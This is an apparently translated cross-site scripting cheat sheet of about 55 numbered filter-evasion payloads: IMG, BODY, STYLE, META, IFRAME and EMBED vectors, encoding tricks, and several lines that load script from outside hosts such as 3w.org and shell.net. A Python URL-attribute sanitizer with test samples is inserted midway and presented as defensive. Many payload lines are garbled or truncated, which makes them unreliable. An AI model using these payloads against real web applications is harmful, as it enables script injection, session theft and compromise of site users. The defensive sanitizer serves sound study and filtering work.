(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert pop-ups
<q/oncut=alert()>
<s/onclick=alert()>
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag without semicolon or quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically useless domestically, since there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters before the JavaScript
<IMG SRC=\'#\'" javascript:alert('XSS');">
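The defender's counterpart to items (3) through (19): a URL-attribute check that canonicalizes the value the way a browser does (entity decoding with or without semicolons, case folding, removal of tabs, newlines, carriage returns, NUL and other control characters) before testing the scheme. This is an added example in Python, not code from the original post; the sample values are constructed here to mirror the evasions listed above.

```python
import html
import re

# ASCII controls (NUL, tab, LF, CR, ...) and space: browsers drop tab/LF/CR
# anywhere in a URL and leading/trailing controls, so strip them all.
_CONTROL_RE = re.compile(r"[\x00-\x20\x7f]")
_SCHEME_RE = re.compile(r"([A-Za-z][A-Za-z0-9+.-]*):")
# Schemes the payloads above rely on (items 3-19 and 40).
SCRIPT_SCHEMES = {"javascript", "vbscript"}


def canonical_scheme(value: str) -> str:
    """Lower-cased scheme a browser would see in an attribute value, or ''."""
    # html.unescape() decodes named and numeric references with or without
    # the trailing semicolon (items 5, 9, 10); controls and NUL are then
    # removed (items 11-15, 17, 19) and case is folded (item 4).
    decoded = html.unescape(value)
    stripped = _CONTROL_RE.sub("", decoded)
    match = _SCHEME_RE.match(stripped)
    return match.group(1).lower() if match else ""


def is_safe_url_attribute(value: str) -> bool:
    """True if the value cannot resolve to a script-executing scheme."""
    return canonical_scheme(value) not in SCRIPT_SCHEMES


# Constructed samples mirroring the evasions above, with expected verdicts.
SAMPLES = {
    "JaVaScRiPt:alert('XSS')": False,
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert()": False,
    "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert()": False,
    "jav\tascript:alert('XSS')": False,
    "jav&#x0A;ascript:alert('XSS')": False,
    "java\x00script:alert('XSS')": False,
    " \x0e  javascript:alert('XSS')": False,
    "https://example.invalid/page": True,
    "/relative/path?q=javascript": True,
}


def audit(samples=SAMPLES) -> list:
    """Return sample values whose verdict differs from the expected one."""
    return [v for v, ok in samples.items() if is_safe_url_attribute(v) != ok]


if __name__ == "__main__":
    for value in SAMPLES:
        print(f"{canonical_scheme(value) or '(none)':<11} {value!r}")
    print("mismatches:", audit())
```

The check is deliberately conservative (it also strips interior spaces), so it may reject odd but harmless values; the safe direction for an allowlist is to reject and let the application fall back to a neutral URL.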
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag, part 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC=\'#\'" /span>

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC=\'#\'" /span>

(35) IMG LOWSRC
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC=\'#\'" /IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>